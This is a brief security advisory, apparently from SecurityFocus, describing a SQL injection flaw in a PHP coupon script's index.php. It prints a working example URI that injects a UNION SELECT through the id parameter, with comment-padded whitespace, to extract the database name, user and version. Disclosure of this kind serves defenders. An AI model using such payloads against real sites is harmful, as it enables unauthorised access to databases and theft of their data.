PHP Coupon Script 'index.php' SQL Injection Vulnerability

An attacker can exploit this issue using a browser.

The following example URI is available:

http://www.example.com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*


 

Privacy Statement
Copyright 2010, SecurityFocus